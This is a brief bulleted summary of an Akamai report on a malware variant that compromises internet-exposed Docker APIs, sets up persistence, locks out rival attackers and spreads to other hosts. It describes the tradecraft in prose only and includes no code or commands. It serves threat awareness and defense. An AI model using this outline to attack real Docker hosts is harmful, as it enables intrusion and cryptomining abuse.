Overview
- Akamai reports a new variant targeting internet-exposed Docker APIs that blocks outside access to the API after compromise to keep rivals out.
- The attack launches a container from a modified Alpine image, mounts the host filesystem, runs a Base64 command, and pulls a second-stage script from a Tor .onion service.
- Persistence is installed by adding an attacker SSH key and a cron job that repeatedly enforces firewall rules to close port 2375, while tools like masscan, torsocks, zstd, and libpcap are deployed.
- A Go-based dropper scans for other exposed Docker APIs and replicates the intrusion, removing competitor containers—particularly Ubuntu-based ones often used for cryptomining.
- Researchers note dormant code paths for Telnet (port 23) and Chrome remote debugging (port 9222), Tor-backed distribution, published IOCs from honeypot observations, and a source artifact emoji that may hint at LLM-assisted development.